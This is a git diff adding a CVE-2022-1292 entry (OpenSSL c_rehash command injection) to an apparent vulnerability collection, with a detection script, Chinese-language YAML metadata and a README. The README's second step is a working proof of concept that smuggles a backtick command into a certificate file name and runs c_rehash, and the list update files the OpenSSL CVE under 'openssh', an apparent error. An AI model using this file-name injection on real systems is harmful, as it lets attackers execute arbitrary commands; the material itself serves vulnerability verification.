diff --git a/cve/openssl/2022/CVE-2022-1292/README.md b/cve/openssl/2022/CVE-2022-1292/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..8c17fd1aeb04b88908db6f3b34e0fd9c76acda84
--- /dev/null
+++ b/cve/openssl/2022/CVE-2022-1292/README.md
@@ -0,0 +1,13 @@
+### 漏洞验证-1：
+```shell
+$ chmod +x chack.sh
+$ ./chack.sh
+```
+![](./png/CVE-2022-1292.png)
+
+### 漏洞验证-2:
+```shell
+$ echo "-----BEGIN CERTIFICATE-----" > "hey.crt\`ps\`"
+$ c_rehash .
+```
+![](./png/CVE-2022-1292-1.png)
\ No newline at end of file
diff --git a/cve/openssl/2022/CVE-2022-1292/chack.sh b/cve/openssl/2022/CVE-2022-1292/chack.sh
new file mode 100644
index 0000000000000000000000000000000000000000..3ae0426f8f74f04e44f7de8990ddcec12a03b00e
--- /dev/null
+++ b/cve/openssl/2022/CVE-2022-1292/chack.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+
+find_cmd=`whereis c_rehash | grep "c_rehash"`
+arr=($find_cmd)
+path=${arr[1]}
+grep_cmd=`cat $path|grep '"$openssl" x509 $x509hash -fingerprint -noout -in "$fname"'`
+if [ -n "$grep_cmd" ]; then
+	echo "System is Vulnerable! Please fix asap"
+else
+	echo "System is not Vulnerable!"
+fi
\ No newline at end of file
diff --git a/cve/openssl/2022/CVE-2022-1292/png/CVE-2022-1292-1.png b/cve/openssl/2022/CVE-2022-1292/png/CVE-2022-1292-1.png
new file mode 100644
index 0000000000000000000000000000000000000000..a6d7692e156763d9dd5b9ff9250f51d43f2163d9
Binary files /dev/null and b/cve/openssl/2022/CVE-2022-1292/png/CVE-2022-1292-1.png differ
diff --git a/cve/openssl/2022/CVE-2022-1292/png/CVE-2022-1292.png b/cve/openssl/2022/CVE-2022-1292/png/CVE-2022-1292.png
new file mode 100644
index 0000000000000000000000000000000000000000..d19b9d947d57dc81dcc4d839641d8c80c4d2bd68
Binary files /dev/null and b/cve/openssl/2022/CVE-2022-1292/png/CVE-2022-1292.png differ
diff --git a/cve/openssl/2022/yaml/CVE-2022-1292.yaml b/cve/openssl/2022/yaml/CVE-2022-1292.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..e8385ba56c9a8bb8d20d14396c2561bd0a9f9f7a
--- /dev/null
+++ b/cve/openssl/2022/yaml/CVE-2022-1292.yaml
@@ -0,0 +1,24 @@
+id: CVE-2022-1292
+source: 
+  https://github.com/alcaparra/CVE-2022-1292
+  https://github.com/li8u99/CVE-2022-1292
+info:
+  name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层（SSLv2/v3）和安全传输层（TLSv1）协议的通用加密库。该产品支持多种加密算法，包括对称密码、哈希算法、安全散列算法等。
+  severity: critical
+  description: |
+    OpenSSL 存在操作系统命令注入漏洞，该漏洞源于c_rehash 脚本未正确清理 shell 元字符导致命令注入。攻击者利用该漏洞执行任意命令。
+  scope-of-influence:
+    OpenSSL 1.0.2
+    OpenSSL 1.1.1
+    OpenSSL 3.x
+  reference:
+    - https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1292
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-1292 
+    cwe-id: CWE-78
+    cnvd-id: None
+    kve-id: None
+  tags: 命令执行,命令注入,cve2022
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 276c1b8677532aa5c0e04a044b8026ab222caea0..73d4d30486c499d895a79b0c28fc246d79dca477 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -30,6 +30,8 @@ cve:
     - CVE-2022-0572
     - CVE-2022-0629
     - CVE-2022-0729
+  openssh:
+    - CVE-2022-1292
 cnvd:
 kve:
   kylin-software-properties: